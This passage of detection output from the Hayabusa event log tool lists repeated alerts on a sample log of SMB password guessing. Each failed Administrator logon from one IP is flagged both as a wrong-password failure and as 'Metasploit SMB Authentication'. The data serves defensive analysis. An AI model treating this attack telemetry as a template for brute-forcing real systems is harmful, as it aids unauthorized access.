NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
